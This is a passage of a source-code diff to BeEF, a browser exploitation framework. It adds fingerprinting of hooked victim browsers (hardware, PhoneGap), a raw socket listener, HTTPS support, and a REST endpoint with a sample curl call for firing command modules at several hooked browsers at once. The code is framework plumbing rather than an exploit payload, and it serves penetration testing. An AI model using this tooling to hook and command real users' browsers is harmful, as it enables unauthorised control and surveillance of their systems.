             self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasPhonegap
+          has_phonegap = get_param(@data['results'], 'HasPhonegap')
+          if BeEF::Filters.is_valid_yes_no?(has_phonegap)
+            BD.set(session_id, 'HasPhonegap', has_phonegap)
+          else
+            self.err_msg "Invalid value for HasPhonegap returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasGoogleGears
           has_googlegears = get_param(@data['results'], 'HasGoogleGears')
           if BeEF::Filters.is_valid_yes_no?(has_googlegears)
@@ -263,7 +279,7 @@ module BeEF
           end
 
           # log a few info of newly hooked zombie in the console
-          print_info "New Hooked Browser [ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
+          print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
 
 
           # Call autorun modules

core/main/handlers/modules/beefjs.rb

@@ -32,9 +32,12 @@ module Modules
       # @note we load websocket library only if ws server is enabled in config.yalm
       # check in init.js
       if config.get("beef.http.websocket.enable")
-        js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js)
+
+        js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js)
       else
-        js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js)
+        js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js)
+
+
       end
 
       # @note construct the beefjs string from file(s)

core/main/handlers/modules/command.rb

@@ -82,7 +82,7 @@ module BeEF
             # @note prints the event to the console
             if BeEF::Settings.console?
               name = command_module.friendlyname || kclass
-              print_info "Hooked browser #{hooked_browser.ip} has been sent instructions from command module '#{name}'"
+              print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has been sent instructions from command module '#{name}'"
             end
 
             # @note flag that the command has been sent to the hooked browser

core/main/logger.rb

@@ -24,6 +24,10 @@ module Core
     # Constructor
     def initialize
       @logs = BeEF::Core::Models::Log
+      @config = BeEF::Core::Configuration.instance
+
+      # if notifications are enabled create a new instance
+      @notifications = BeEF::Extension::Notifications::Notifications unless @config.get('beef.extension.notifications.enable') == false
     end
   
     # Registers a new event in the logs
@@ -34,6 +38,9 @@ module Core
     def register(from, event, hb = 0)
       # type conversion to enforce standards
       hb = hb.to_i
+
+      # get time now
+      time_now = Time.now
       
       # arguments type checking
       raise Exception::TypeError, '"from" needs to be a string' if not from.string?
@@ -41,7 +48,12 @@ module Core
       raise Exception::TypeError, '"Hooked Browser ID" needs to be an integer' if not hb.integer?
       
       # logging the new event into the database
-      @logs.new(:type => "#{from}", :event => "#{event}", :date => Time.now, :hooked_browser_id => hb).save
+      @logs.new(:type => "#{from}", :event => "#{event}", :date => time_now, :hooked_browser_id => hb).save
+
+      # if notifications are enabled send the info there too
+      if @notifications
+        @notifications.new(from, event, time_now, hb)
+      end
       
       # return
       true

core/main/models/browserdetails.rb

@@ -62,7 +62,7 @@ module Models
     
       browserdetails
     end
-  
+ 
     #
     # Returns the icon representing the browser type the
     # hooked browser is using (i.e. Firefox, Internet Explorer)
@@ -94,9 +94,10 @@ module Models
       return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
       return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
       return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
+      return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
       return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
       return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
       return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
@@ -105,6 +106,33 @@ module Models
       BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
     end
   
+    #
+    # Returns the icon representing the hardware the
+    # zombie is running on (i.e. iPhone, BlackBerry)
+    #
+    def self.hw_icon(session_id)
+
+      ua_string = get(session_id, 'BrowserReportedName')
+
+      return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
+
+      return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_ZUNE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ZUNE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_BLACKBERRY_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPHONE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPAD_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPOD_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_KINDLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_KINDLE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_NOKIA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_NOKIA_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_MOTOROLA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_MOTOROLA_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_HTC_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_HTC_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_GOOGLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_GOOGLE_UA_STR
+	return BeEF::Core::Constants::Hardware::HW_ERICSSON_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ERICSSON_UA_STR
+
+      BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG
+
+    end
+
   end
 
 end

core/main/models/command.rb

@@ -65,11 +65,11 @@ module Models
       command.save
 
       # @note log that the result was returned
-      BeEF::Core::Logger.instance.register('Command', "Hooked browser #{hooked_browser.ip} has executed instructions from command module '#{command_friendly_name}'", hooked_browser_id)
+      BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module '#{command_friendly_name}'", hooked_browser_id)
 
       # @note prints the event into the console
       if BeEF::Settings.console?
-        print_info "Hooked browser #{hooked_browser.ip} has executed instructions from command module '#{command_friendly_name}'"
+        print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module '#{command_friendly_name}'"
       end
     end
 

core/main/network_stack/assethandler.rb

@@ -29,6 +29,7 @@ module Handlers
     # Starts the AssetHandler instance
     def initialize
       @allocations = {}
+      @sockets = {}
       @http_server = BeEF::Core::Server.instance
       @root_dir = File.expand_path('../../../../', __FILE__)
     end
@@ -59,6 +60,37 @@ module Handlers
         print_info "Url [" + url + "] unmounted"
     end
 
+    # use it like: bind_socket("irc","0.0.0.0",6667)
+    def bind_socket(name, host, port)
+      if @sockets[name] != nil
+        print_error "Thread [#{name}] is already listening on [#{host}:#{port}]."
+      else
+        t = Thread.new {
+          server = TCPServer.new(host,port)
+          loop do
+            Thread.start(server.accept) do |client|
+              data = ""
+              recv_length = 1024
+              while (tmp = client.recv(recv_length))
+                data += tmp
+                break if tmp.length < recv_length || tmp.length == recv_length
+              end
+              client.close
+              print_debug "Bind Socket on Thread [#{name}] received:\n#{data}"
+            end
+          end
+        }
+        @sockets[name] = t
+        print_info "Thread [#{name}] listening on [#{host}:#{port}]."
+      end
+    end
+
+    def unbind_socket(name)
+      t = @sockets[name]
+      Thread.kill(t)
+      print_info "Thread [#{name}] killed."
+    end
+
     # Builds a URL based on the path and extension, if neither are passed a random URL will be generated
     # @param [String] path URL Path defined by bind()
     # @param [String] extension Extension defined by bind()

core/main/rest/handlers/hookedbrowsers.rb

@@ -76,11 +76,12 @@ module BeEF
            details = BeEF::Core::Models::BrowserDetails
 
            {
+               'id' => hb.id,
+               'session' => hb.session,
                'name' => details.get(hb.session, 'BrowserName'),
                'version' => details.get(hb.session, 'BrowserVersion'),
                'os' => details.get(hb.session, 'OsName'),
                'platform' => details.get(hb.session, 'SystemPlatform'),
-               'session' => hb.session,
                'ip' => hb.ip,
                'domain' => details.get(hb.session, 'HostName'),
                'port' => hb.port.to_s,

core/main/rest/handlers/modules.rb

@@ -141,6 +141,54 @@ module BeEF
             error 400 # Bad Request
           end
         end
+
+        #@note Fire a new command module to multiple hooked browsers.
+        # Returns the command IDs of the launched modules, or 0 if firing got issues.
+        # POST request body example (for modules that don't need parameters, just remove "mod_params")
+        #  {
+        #    "mod_id":1,
+        #    "mod_params":{
+        #       "question":"are you hooked?"
+        #     },
+        #    "hb_ids":[1,2]
+        #   }
+        # response example: {"1":16,"2":17}
+        # curl example (alert module with custom text, 2 hooked browsers)):
+        #curl -H "Content-Type: application/json; charset=UTF-8" -d '{"mod_id":110,"mod_params":{"text":"mucci?"},"hb_ids":[1,2]}'
+        #-X POST http://127.0.0.1:3000/api/modules/multi?token=2316d82702b83a293e2d46a0886a003a6be0a633
+        post '/multi' do
+          request.body.rewind
+          begin
+            body = JSON.parse request.body.read
+
+            modk = BeEF::Module.get_key_by_database_id body["mod_id"]
+            error 404 unless modk != nil
+            mod_params = []
+
+            if body["mod_params"] != nil
+              body["mod_params"].each{|k,v|
+                mod_params.push({'name' => k, 'value' => v})
+              }
+            end
+
+            hb_ids = body["hb_ids"]
+            results = Hash.new
+            hb_ids.each do |hb_id|
+              hb = BeEF::Core::Models::HookedBrowser.first(:id => hb_id)
+              if hb == nil
+                results[hb_id] = 0
+                next
+              else
+                cmd_id = BeEF::Module.execute(modk, hb.session, mod_params)
+                results[hb_id] = cmd_id
+              end
+            end
+            results.to_json
+          rescue Exception => e
+            print_error "Invalid JSON input passed to endpoint /api/modules/multi"
+            error 400 # Bad Request
+          end
+        end
       end
     end
   end

core/main/server.rb

@@ -48,7 +48,8 @@ module BeEF
             'beef_public' => @configuration.get('beef.http.public'),
             'beef_public_port' => @configuration.get('beef.http.public_port'),
             'beef_dns' => @configuration.get('beef.http.dns'),
-            'beef_hook' => @configuration.get('beef.http.hook_file')
+            'beef_hook' => @configuration.get('beef.http.hook_file'),
+            'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http"
         }
       end
 
@@ -108,6 +109,13 @@ module BeEF
               @configuration.get('beef.http.host'),
               @configuration.get('beef.http.port'),
               @rack_app)
+
+          if @configuration.get('beef.http.https.enable') == true
+            @http_server.ssl = true
+            @http_server.ssl_options = {:private_key_file => $root_dir + "/" + @configuration.get('beef.http.https.key'),
+                                      :cert_chain_file => $root_dir + "/" + @configuration.get('beef.http.https.cert'),
+                                      :verify_peer => false}
+          end
         end
       end
 

extensions/admin_ui/controllers/modules/modules.rb

@@ -28,6 +28,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
   def initialize
     super({
       'paths' => {
+        '/getRestfulApiToken.json'          => method(:get_restful_api_token),
         '/select/commandmodules/all.json'   => method(:select_all_command_modules),
         '/select/commandmodules/tree.json'  => method(:select_command_modules_tree),
         '/select/commandmodule.json'        => method(:select_command_module),
@@ -43,6 +44,17 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     
     @session = BeEF::Extension::AdminUI::Session.instance
   end
+
+  # @note Returns the RESTful api key. Authenticated call, so callable only
+  # from the admin UI after successful authentication (cookie).
+  # -> http://127.0.0.1:3000/ui/modules/getRestfulApiToken.json
+  # response
+  # <- {"token":"800679edbb59976935d7673924caaa9e99f55c32"}
+  def get_restful_api_token
+     @body = {
+         'token' => BeEF::Core::Configuration.instance.get("beef.api_token")
+     }.to_json
+  end
   
   # Returns a JSON array containing the summary for a selected zombie.
   def select_zombie_summary
@@ -136,7 +148,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
 
     # set and add the return values for the os name
     os_name = BD.get(zombie_session, 'OsName')
-    if not host_name.nil?
+    if not os_name.nil?
       encoded_os_name = CGI.escapeHTML(os_name)
       encoded_os_name_hash = { 'OS Name' => encoded_os_name }
 
@@ -148,6 +160,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController
 
       summary_grid_hash['results'].push(page_name_row) # add the row
     end
+
+    # set and add the return values for the hardware name
+    hw_name = BD.get(zombie_session, 'Hardware')
+    if not hw_name.nil?
+      encoded_hw_name = CGI.escapeHTML(hw_name)
+      encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
+
+      page_name_row = {
+        'category' => 'Host',
+        'data' => encoded_hw_name_hash,
+        'from' => 'Initialization'
+      }
+
+      summary_grid_hash['results'].push(page_name_row) # add the row
+    end
  
     # set and add the return values for the browser name
     browser_name = BD.get(zombie_session, 'BrowserName') 
@@ -331,6 +358,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController
       summary_grid_hash['results'].push(page_name_row) # add the row
     end
 
+    # set and add the yes|no value for hasPhonegap
+    has_phonegap = BD.get(zombie_session, 'hasPhonegap')
+    if not has_phonegap.nil?
+      encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
+      encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
+
+      page_name_row = {
+        'category' => 'Browser',
+        'data' => encoded_has_phonegap_hash,
+        'from' => 'Initialization'
+      }
+
+      summary_grid_hash['results'].push(page_name_row) # add the row
+    end
+
     # set and add the yes|no value for HasGoogleGears
     has_googlegears = BD.get(zombie_session, 'HasGoogleGears')
     if not has_googlegears.nil?

extensions/admin_ui/controllers/panel/panel.rb

@@ -14,94 +14,115 @@
 #   limitations under the License.
 #
 module BeEF
-module Extension
-module AdminUI
-module Controllers
+  module Extension
+    module AdminUI
+      module Controllers
 
 #
 #
 #
-class Panel < BeEF::Extension::AdminUI::HttpController
-  
-  def initialize
-    super({
-      'paths' => {
-        '/' => method(:index),
-        '/hooked-browser-tree-update.json' => method(:hooked_browser_tree_update)
-      }
-    })
-  end
-  
-  # default index page
-  def index; end
-  
-  # return a JSON object contains all the updates for the hooked browser trees
-  def hooked_browser_tree_update
-    # retrieve the hbs that are online
-    hooked_browsers_online = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)))
-    
-    # retrieve the hbs that are offline
-    hooked_browsers_offline = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)))
-    
-    # retrieve the distributed engine rules that are enabled
-    distributed_engine_rules = distributed_engine_rules_2_json_simple(BeEF::Core::DistributedEngine::Models::Rules.all(:enabled => true))
-    
-    # hash that gets populated with all the information for the hb trees
-    ret = {
-      'success' => true,
-      
-      # the list of hb
-      'hooked-browsers' => {
-        'online' => hooked_browsers_online,
-        'offline' => hooked_browsers_offline
-      },
-      
-      # the rules for the distributed engine
-      'ditributed-engine-rules' => distributed_engine_rules
-    }
-    
-    @body = ret.to_json
-  end
-  
-  # Takes a list distributed engine rules and format the results into JSON
-  def distributed_engine_rules_2_json_simple(rules)
+        class Panel < BeEF::Extension::AdminUI::HttpController
 
-  end
-  
-  # Takes a list of zombies and format the results in a JSON array.
-  def zombies2json_simple(zombies)
-    zombies_hash = {}
-    i = 0
-    
-    zombies.each do |zombie|
-      # create hash of zombie details
-      zombies_hash[i] = (get_simple_hooked_browser_hash(zombie))
-      i+=1
+          def initialize
+            super({
+                      'paths' => {
+                          '/' => method(:index),
+                          '/hooked-browser-tree-update.json' => method(:hooked_browser_tree_update)
+                      }
+                  })
+          end
+
+          # default index page
+          def index;
+          end
+
+          # return a JSON object contains all the updates for the hooked browser trees
+          def hooked_browser_tree_update
+            # retrieve the hbs that are online
+            hooked_browsers_online = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)))
+
+            # retrieve the hbs that are offline
+            hooked_browsers_offline = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)))
+
+            # retrieve the distributed engine rules that are enabled
+            distributed_engine_rules = distributed_engine_rules_2_json_simple(BeEF::Core::DistributedEngine::Models::Rules.all(:enabled => true))
+
+            # hash that gets populated with all the information for the hb trees
+            ret = {
+                'success' => true,
+
+                # the list of hb
+                'hooked-browsers' => {
+                    'online' => hooked_browsers_online,
+                    'offline' => hooked_browsers_offline
+                },
+
+                # the rules for the distributed engine
+                'ditributed-engine-rules' => distributed_engine_rules
+            }
+
+            @body = ret.to_json
+          end
+
+          # Takes a list distributed engine rules and format the results into JSON
+          def distributed_engine_rules_2_json_simple(rules)
+
+          end
+
+          # Takes a list of zombies and format the results in a JSON array.
+          def zombies2json_simple(zombies)
+            zombies_hash = {}
+            i = 0
+
+            zombies.each do |zombie|
+              # create hash of zombie details
+              zombies_hash[i] = (get_simple_hooked_browser_hash(zombie))
+              i+=1
+            end
+
+            zombies_hash
+          end
+
+          # create a hash of simple hooked browser details
+          def get_simple_hooked_browser_hash(hooked_browser)
+
+            browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName')
+            browser_version = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserVersion')
+            browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
+            os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
+            os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName')
+            hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session)
+            hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
+            domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
+            has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
+            has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
+            has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
+            has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
+            date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
+
+            return {
+                'session' => hooked_browser.session,
+                'ip' => hooked_browser.ip,
+                'domain' => domain,
+                'port' => hooked_browser.port.to_s,
+                'browser_name' => browser_name,
+                'browser_version' => browser_version,
+                'browser_icon' => browser_icon,
+                'os_icon' => os_icon,
+                'os_name' => os_name,
+                'hw_icon' => hw_icon,
+                'hw_name' => hw_name,
+                'has_flash' => has_flash,
+                'has_web_sockets' => has_web_sockets,
+                'has_googlegears' => has_googlegears,
+                'has_java' => has_java,
+                'date_stamp' => date_stamp
+            }
+
+          end
+        end
+
+      end
     end
-    
-    zombies_hash
-  end
-  
-  # create a hash of simple hooked browser details
-  def get_simple_hooked_browser_hash(hooked_browser)
-    
-    browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
-    os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
-    domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
-    
-    return {
-      'session' => hooked_browser.session,
-      'ip' => hooked_browser.ip,
-      'domain' => domain,
-      'port' => hooked_browser.port.to_s,
-      'browser_icon' => browser_icon,
-      'os_icon' => os_icon
-    }
-    
   end
 end
-
-end
-end
-end
-end

extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js

@@ -20,18 +20,49 @@ var ZombiesMgr = function(zombies_tree_lists) {
 	
 	// this is a helper class to create a zombie object from a JSON hash index
 	this.zombieFactory = function(index, zombie_array){
-		text = "<img src='/ui/media/images/icons/"+escape(zombie_array[index]["browser_icon"])+"' style='padding-top:3px;' width='13px' height='13px'/> ";
-		text += "<img src='/ui/media/images/icons/"+escape(zombie_array[index]["os_icon"])+"' style='padding-top:3px;' width='13px' height='13px'/> ";
-		text += zombie_array[index]["ip"];
+
+		var ip                 = zombie_array[index]["ip"];
+		var session            = zombie_array[index]["session"];
+		var browser_name       = zombie_array[index]["browser_name"];
+		var browser_version    = zombie_array[index]["browser_version"];
+		var browser_icon       = zombie_array[index]["browser_icon"];
+		var os_icon            = zombie_array[index]["os_icon"];
+		var os_name            = zombie_array[index]["os_name"];
+		var hw_name            = zombie_array[index]["hw_name"];
+		var hw_icon            = zombie_array[index]["hw_icon"];
+		var domain             = zombie_array[index]["domain"];
+		var port               = zombie_array[index]["port"];
+		var has_flash          = zombie_array[index]["has_flash"];
+		var has_web_sockets    = zombie_array[index]["has_web_sockets"];
+		var has_googlegears    = zombie_array[index]["has_googlegears"];
+        var has_java           = zombie_array[index]["has_java"];
+		var date_stamp         = zombie_array[index]["date_stamp"];
+
+		text = "<img src='/ui/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
+		text+= "<img src='/ui/media/images/icons/"+escape(os_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
+		text+= "<img src='/ui/media/images/icons/"+escape(hw_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
+		text+= ip;
+
+		balloon_text = "IP: "                  + ip;
+		balloon_text+= "<br/>Browser: "        + browser_name + " " + browser_version;
+		balloon_text+= "<br/>System: "         + os_name;
+		balloon_text+= "<br/>Hardware: "       + hw_name;
+		balloon_text+= "<br/>Domain: "         + domain + ":" + port;
+		balloon_text+= "<br/>Flash: "          + has_flash;
+        balloon_text+= "<br/>Java: "           + has_java;
+        balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
+		balloon_text+= "<br/>Google Gears: "   + has_googlegears;
+		balloon_text+= "<br/>Date: "           + date_stamp;
 		
 		var new_zombie = {
-			'id' : index,
-			'ip' :  zombie_array[index]["ip"],
-			'session' : zombie_array[index]["session"],
-			'text': text,
-			'check' : false,
-			'domain' : zombie_array[index]["domain"],
-            'port' : zombie_array[index]["port"]
+			'id'           : index,
+			'ip'           : ip,
+			'session'      : session,
+			'text'         : text,
+			'balloon_text' : balloon_text,
+			'check'        : false,
+			'domain'       : domain,
+            'port'         : port
 		};
 		
 		return new_zombie;

extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js

@@ -36,6 +36,7 @@ zombiesTreeList = function(id) {
 	//the tree node that contains the list of online hooked browsers
 	this.online_hooked_browsers_treenode = this.root.appendChild(
         new Ext.tree.TreeNode({
+            qtip: "Online hooked browsers",
             text:'Online Browsers',
             cls:'online-zombies-node',
             expanded:true
@@ -45,6 +46,7 @@ zombiesTreeList = function(id) {
 	//the tree node that contains the list of offline hooked browsers
 	this.offline_hooked_browsers_treenode = this.root.appendChild(
         new Ext.tree.TreeNode({
+            qtip: "Offline hooked browsers",
             text:'Offline Browsers',
             cls:'offline-zombies-node',
             expanded:false
@@ -183,7 +185,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
 	 */
     addZombie: function(hooked_browser, online, checkbox) {
 		var hb_id, mother_node, node;
-		
+
 		if(online) {
 			hb_id = 'zombie-online-' + hooked_browser.session;
 			mother_node = this.online_hooked_browsers_treenode;
@@ -193,7 +195,9 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
 		}
 		var exists = this.getNodeById(hb_id);
 		if(exists) return;
-		
+
+		hooked_browser.qtip = hooked_browser.balloon_text;
+
 		//save a new online HB
 		if(online && Ext.pluck(this.online_hooked_browsers_array, 'session').indexOf(hooked_browser.session)==-1) {
 			this.online_hooked_browsers_array.push(hooked_browser);
@@ -216,7 +220,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
         
 		//creates a new node for that hooked browser
 		node = new Ext.tree.TreeNode(hooked_browser);
-		
+
 		//creates a sub-branch for that HB if necessary
 		mother_node = this.addSubFolder(mother_node, hooked_browser[this.tree_configuration['sub-branch']], checkbox);
 		
@@ -253,6 +257,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
 			sub_folder_node = new Ext.tree.TreeNode({
 				id: 'sub-folder-'+folder,
 				text: folder,
+				qtip: "Browsers hooked on "+folder,
 				checked: ((checkbox) ? false : null),
 				type: this.tree_configuration["sub-branch"]
 				});

extensions/console/lib/command_dispatcher/command.rb

@@ -53,10 +53,10 @@ class Command
     print_line("Module name: " + driver.interface.cmd['Name'])
     print_line("Module category: " + driver.interface.cmd['Category'])
     print_line("Module description: " + driver.interface.cmd['Description'])
-    print_line("Module parameters:")
+    print_line("Module parameters:") if not driver.interface.cmd['Data'].length == 0
 
     driver.interface.cmd['Data'].each{|data|
-      print_line(data['name'] + " => \"" + data['value'].to_s + "\" # this is the " + data['ui_label'] + " parameter")
+      print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
     } if not driver.interface.cmd['Data'].nil?
   end
   
@@ -168,4 +168,4 @@ class Command
   
 end
 
-end end end end
+end end end end

extensions/console/lib/command_dispatcher/core.rb

@@ -47,10 +47,14 @@ class Core
   end
   
   def cmd_back(*args)
-	  if (driver.current_dispatcher.name == 'Command')
-	    driver.remove_dispatcher('Command')
-	    driver.interface.clearcommand #TODO: TIDY THIS UP
-	    driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ")
+	if (driver.current_dispatcher.name == 'Command')
+	  driver.remove_dispatcher('Command')
+	  driver.interface.clearcommand #TODO: TIDY THIS UP
+      if driver.interface.targetid.length > 1
+        driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ")
+      else
+        driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ")
+      end
     elsif (driver.current_dispatcher.name == 'Target')
       driver.remove_dispatcher('Target')
       driver.interface.cleartarget
@@ -147,11 +151,12 @@ class Core
         [
           'Id',
           'IP',
+          'Browser',
           'OS'
         ])
     
     BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
-      tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Core::Models::BrowserDetails.os_icon(zombie.session))]
+      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')]
     end
     
     puts "\n"
@@ -178,11 +183,12 @@ class Core
         [
           'Id',
           'IP',
+          'Browser',
           'OS'
         ])
     
     BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie|
-      tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Core::Models::BrowserDetails.os_icon(zombie.session))]
+      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')]
     end
     
     puts "\n"
@@ -213,23 +219,30 @@ class Core
     BeEF::Core::Models::HookedBrowser.all(:lastseen.gt => (Time.new.to_i - 30)).each do |zombie|
       onlinezombies << zombie.id
     end
-    
-    if not onlinezombies.include?(args[0].to_i)
-      print_status("Browser does not appear to be online..")
-      return false
-    end
-    
-    if not driver.interface.settarget(args[0]).nil?
+
+	targets = args[0].split(',')
+	targets.each {|t|
+        if not onlinezombies.include?(t.to_i)
+          print_status("Browser [id:"+t.to_s+"] does not appear to be online.")
+          return false
+        end
+		#print_status("Adding browser [id:"+t.to_s+"] to target list.")
+    }
+ 
+    if not driver.interface.settarget(targets).nil?
     
       if (driver.dispatcher_stack.size > 1 and
